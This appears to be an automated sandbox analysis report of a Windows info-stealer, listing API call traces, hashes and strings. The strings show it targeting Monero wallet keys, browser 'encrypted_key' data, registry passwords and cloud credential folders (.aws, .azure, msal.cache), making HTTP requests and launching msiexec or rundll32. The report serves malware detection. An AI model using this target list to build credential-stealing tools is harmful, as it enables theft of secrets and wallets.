                                • Part of subcall function 009FA820: lstrcpy.KERNEL32(00A00DDE,00000000), ref: 009FA885
                              • lstrlen.KERNEL32(?), ref: 009ED32A
                              • lstrlen.KERNEL32(?), ref: 009ED339
                                • Part of subcall function 009FAA70: StrCmpCA.SHLWAPI(013B8800,009EA7A7,?,009EA7A7,013B8800), ref: 009FAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 009ED3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: db3675a4af7afd5946c4f1ab52e5c6a999cc609830a9d3f98d2fc055fe75b000
                              • Instruction ID: 2ab8a2ef2545bc5625a9a347815a86a6161e1e46952d5cca662f1a41b3524856
                              • Opcode Fuzzy Hash: db3675a4af7afd5946c4f1ab52e5c6a999cc609830a9d3f98d2fc055fe75b000
                              • Instruction Fuzzy Hash: 42E11EB191010CABCB14EBA0DD96FFE7378BF54301F104558F60AA64A1DF75AE0ACB66
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013BC958,00000000,?,00A0144C,00000000,?,?), ref: 009ECA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 009ECA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 009ECA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 009ECAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 009ECAD9
                              • StrStrA.SHLWAPI(?,013BCA18,00A00B52), ref: 009ECAF7
                              • StrStrA.SHLWAPI(00000000,013BCAD8), ref: 009ECB1E
                              • StrStrA.SHLWAPI(?,013BD338,00000000,?,00A01458,00000000,?,00000000,00000000,?,013B8820,00000000,?,00A01454,00000000,?), ref: 009ECCA2
                              • StrStrA.SHLWAPI(00000000,013BD238), ref: 009ECCB9
                                • Part of subcall function 009EC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 009EC871
                                • Part of subcall function 009EC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 009EC87C
                              • StrStrA.SHLWAPI(?,013BD238,00000000,?,00A0145C,00000000,?,00000000,013B87F0), ref: 009ECD5A
                              • StrStrA.SHLWAPI(00000000,013B8B60), ref: 009ECD71
                                • Part of subcall function 009EC820: lstrcat.KERNEL32(?,00A00B46), ref: 009EC943
                                • Part of subcall function 009EC820: lstrcat.KERNEL32(?,00A00B47), ref: 009EC957
                                • Part of subcall function 009EC820: lstrcat.KERNEL32(?,00A00B4E), ref: 009EC978
                              • lstrlen.KERNEL32(00000000), ref: 009ECE44
                              • CloseHandle.KERNEL32(00000000), ref: 009ECE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 516a9b1dd8fa8f0a3f3b846def0ff66f60e540c792853b0b75043c986fd078eb
                              • Instruction ID: 61a6fe8c49f00a288ffa2026af6482bd4aad4144a44a861e2539cb040f4950b3
                              • Opcode Fuzzy Hash: 516a9b1dd8fa8f0a3f3b846def0ff66f60e540c792853b0b75043c986fd078eb
                              • Instruction Fuzzy Hash: E8E100B1D1010CABDB15EBA4DC91FFEB778AF54340F404169F20A67191DF706A4ACB66
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • RegOpenKeyExA.ADVAPI32(00000000,013BAE80,00000000,00020019,00000000,00A005B6), ref: 009F83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009F8426
                              • wsprintfA.USER32 ref: 009F8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009F847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F8499
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: f9a79cb459a20d0a46c678fc45887b90c4ff18051e6129b8e6a8a4da3bae2a2b
                              • Instruction ID: 3b89dc8f976cd70d079a09975570ec334bf8a116e178888384e4593a966788a4
                              • Opcode Fuzzy Hash: f9a79cb459a20d0a46c678fc45887b90c4ff18051e6129b8e6a8a4da3bae2a2b
                              • Instruction Fuzzy Hash: C2811BB191011CABDB64DB50CC95FEEB7B8FF48700F008699E209A6190DF756B86CFA5
                              APIs
                                • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 009F4DCD
                                • Part of subcall function 009F4910: wsprintfA.USER32 ref: 009F492C
                                • Part of subcall function 009F4910: FindFirstFileA.KERNEL32(?,?), ref: 009F4943
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 009F4E59
                                • Part of subcall function 009F4910: StrCmpCA.SHLWAPI(?,00A00FDC), ref: 009F4971
                                • Part of subcall function 009F4910: StrCmpCA.SHLWAPI(?,00A00FE0), ref: 009F4987
                                • Part of subcall function 009F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009F4B7D
                                • Part of subcall function 009F4910: FindClose.KERNEL32(000000FF), ref: 009F4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 009F4EE5
                                • Part of subcall function 009F4910: wsprintfA.USER32 ref: 009F49B0
                                • Part of subcall function 009F4910: StrCmpCA.SHLWAPI(?,00A008D2), ref: 009F49C5
                                • Part of subcall function 009F4910: wsprintfA.USER32 ref: 009F49E2
                                • Part of subcall function 009F4910: PathMatchSpecA.SHLWAPI(?,?), ref: 009F4A1E
                                • Part of subcall function 009F4910: lstrcat.KERNEL32(?,013BE3B0), ref: 009F4A4A
                                • Part of subcall function 009F4910: lstrcat.KERNEL32(?,00A00FF8), ref: 009F4A5C
                                • Part of subcall function 009F4910: lstrcat.KERNEL32(?,?), ref: 009F4A70
                                • Part of subcall function 009F4910: lstrcat.KERNEL32(?,00A00FFC), ref: 009F4A82
                                • Part of subcall function 009F4910: lstrcat.KERNEL32(?,?), ref: 009F4A96
                                • Part of subcall function 009F4910: CopyFileA.KERNEL32(?,?,00000001), ref: 009F4AAC
                                • Part of subcall function 009F4910: DeleteFileA.KERNEL32(?), ref: 009F4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 89cd4dd3422abf7fbe03823d8bc76dd92fd56dafccdde84d0d53c982c6b8db80
                              • Instruction ID: 3832434724f6deba1cea961da9201b2a63002d8787f8308a730d63b679f13511
                              • Opcode Fuzzy Hash: 89cd4dd3422abf7fbe03823d8bc76dd92fd56dafccdde84d0d53c982c6b8db80
                              • Instruction Fuzzy Hash: 4C4156B995020C67DB64F770EC47FED7338ABA4700F404954B689660C1EEB59BC98B92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009F906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: eb28a853da2ae3cfee70d031023914a35d540d6e732e314982b7576f99ed4d80
                              • Instruction ID: 6db553dca4f26b653f974fd99985b4e24f5cb39353d2bde5c01bea6d6534b762
                              • Opcode Fuzzy Hash: eb28a853da2ae3cfee70d031023914a35d540d6e732e314982b7576f99ed4d80
                              • Instruction Fuzzy Hash: B971DEB5A10208ABDB14DFE4DC89FEEB7B9BF88700F108518F615A7290DB74E945CB61
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009F31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009F335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009F34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: f4cf8d57367adc6694490a5601e7840e1704e4d20b5b3b96857233a806cc478b
                              • Instruction ID: 7aca848ed6adebae1005873ee1b485c1b2d8daafda0eb5f68225dff6e360a1d4
                              • Opcode Fuzzy Hash: f4cf8d57367adc6694490a5601e7840e1704e4d20b5b3b96857233a806cc478b
                              • Instruction Fuzzy Hash: 4D1222B181010CAADB15FB90DC52FFE7778AF94340F508169F60A66091EF746B4ACF56
                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E6280: InternetOpenA.WININET(00A00DFE,00000001,00000000,00000000,00000000), ref: 009E62E1
                                • Part of subcall function 009E6280: StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E6303
                                • Part of subcall function 009E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009E6335
                                • Part of subcall function 009E6280: HttpOpenRequestA.WININET(00000000,GET,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E6385
                                • Part of subcall function 009E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009E63BF
                                • Part of subcall function 009E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009E63D1
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009F5318
                              • lstrlen.KERNEL32(00000000), ref: 009F532F
                                • Part of subcall function 009F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009F8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 009F5364
                              • lstrlen.KERNEL32(00000000), ref: 009F5383
                              • lstrlen.KERNEL32(00000000), ref: 009F53AE
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 8d2ccd09364127311ca4d87bf49f6462eb8f8a951846b91a3663b58d846a6c6f
                              • Instruction ID: 108223c1361e5e440a80774aa244e753b35866dc7f86b52efba75f4943a83194
                              • Opcode Fuzzy Hash: 8d2ccd09364127311ca4d87bf49f6462eb8f8a951846b91a3663b58d846a6c6f
                              • Instruction Fuzzy Hash: A2510DB091014CABCB14FF60CD92BFD7779AF90340F508418FA0A5A591EF74AB46CB66
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: d000db84e8818227f26fef68610d3e02d3f2bc346127763a7ddec50bdec6fa85
                              • Instruction ID: d53c61c2c61ddd334d5a689cc18a1dd032a1d0270440c622a805d0e3bd1a2222
                              • Opcode Fuzzy Hash: d000db84e8818227f26fef68610d3e02d3f2bc346127763a7ddec50bdec6fa85
                              • Instruction Fuzzy Hash: B0C161B590021D9BCB14EF60DC89FFE7379BB94304F104598F60AA7281EA75EA85CF91
                              APIs
                                • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 009F42EC
                              • lstrcat.KERNEL32(?,013BDA10), ref: 009F430B
                              • lstrcat.KERNEL32(?,?), ref: 009F431F
                              • lstrcat.KERNEL32(?,013BC9B8), ref: 009F4333
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009F8D90: GetFileAttributesA.KERNEL32(00000000,?,009E1B54,?,?,00A0564C,?,?,00A00E1F), ref: 009F8D9F
                                • Part of subcall function 009E9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 009E9D39
                                • Part of subcall function 009E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
                                • Part of subcall function 009E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
                                • Part of subcall function 009E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009E9A31
                                • Part of subcall function 009E99C0: ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
                                • Part of subcall function 009E99C0: LocalFree.KERNEL32(009E148F), ref: 009E9A90
                                • Part of subcall function 009E99C0: CloseHandle.KERNEL32(000000FF), ref: 009E9A9A
                                • Part of subcall function 009F93C0: GlobalAlloc.KERNEL32(00000000,009F43DD,009F43DD), ref: 009F93D3
                              • StrStrA.SHLWAPI(?,013BD9F8), ref: 009F43F3
                              • GlobalFree.KERNEL32(?), ref: 009F4512
                                • Part of subcall function 009E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9AEF
                                • Part of subcall function 009E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,009E4EEE,00000000,?), ref: 009E9B01
                                • Part of subcall function 009E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9B2A
                                • Part of subcall function 009E9AC0: LocalFree.KERNEL32(?,?,?,?,009E4EEE,00000000,?), ref: 009E9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 009F44A3
                              • StrCmpCA.SHLWAPI(?,00A008D1), ref: 009F44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009F44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 009F44E5
                              • lstrcat.KERNEL32(00000000,00A00FB8), ref: 009F44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 1797096e061fe5bcca34c2fe407b8ca0cae8004d1ccbb365c195e1a808be948e
                              • Instruction ID: 3cb6f1f1a1d86432ac610508371400f952b19025a1fe819d96e00e0790947d97
                              • Opcode Fuzzy Hash: 1797096e061fe5bcca34c2fe407b8ca0cae8004d1ccbb365c195e1a808be948e
                              • Instruction Fuzzy Hash: ED7114B691020CABDB14FBA4DC85FEE737DBB88300F044598F609A7181EA75DB59CB91
                              APIs
                                • Part of subcall function 009E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009E12B4
                                • Part of subcall function 009E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 009E12BB
                                • Part of subcall function 009E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009E12D7
                                • Part of subcall function 009E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009E12F5
                                • Part of subcall function 009E12A0: RegCloseKey.ADVAPI32(?), ref: 009E12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 009E134F
                              • lstrlen.KERNEL32(?), ref: 009E135C
                              • lstrcat.KERNEL32(?,.keys), ref: 009E1377
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F8B60: GetSystemTime.KERNEL32(00A00E1A,013B9A98,00A005AE,?,?,009E13F9,?,0000001A,00A00E1A,00000000,?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009F8B86
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 009E1465
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
                                • Part of subcall function 009E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
                                • Part of subcall function 009E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009E9A31
                                • Part of subcall function 009E99C0: ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
                                • Part of subcall function 009E99C0: LocalFree.KERNEL32(009E148F), ref: 009E9A90
                                • Part of subcall function 009E99C0: CloseHandle.KERNEL32(000000FF), ref: 009E9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 009E14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 2700be56a774e24ba87d048ed73c470fa6984c2fd9c5470a5dcbe0444df70be3
                              • Instruction ID: 4a2eb9679b1f0ac55cdaa2b030d6b9340856490bb57dbb68b361ed23b7e5907a
                              • Opcode Fuzzy Hash: 2700be56a774e24ba87d048ed73c470fa6984c2fd9c5470a5dcbe0444df70be3
                              • Instruction Fuzzy Hash: 08510EF1D5011D97CB15EB60DD92BFD737CAB94700F4045A8B70A62092EE706B8ACBA6
                              APIs
                                • Part of subcall function 009E72D0: memset.MSVCRT ref: 009E7314
                                • Part of subcall function 009E72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009E733A
                                • Part of subcall function 009E72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009E73B1
                                • Part of subcall function 009E72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 009E740D
                                • Part of subcall function 009E72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 009E7452
                                • Part of subcall function 009E72D0: HeapFree.KERNEL32(00000000), ref: 009E7459
                              • lstrcat.KERNEL32(00000000,00A017FC), ref: 009E7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009E7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 009E765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009E768F
                              • lstrcat.KERNEL32(00000000,00A01804), ref: 009E76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009E76D3
                              • lstrcat.KERNEL32(00000000,00A01808), ref: 009E76ED
                              • task.LIBCPMTD ref: 009E76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
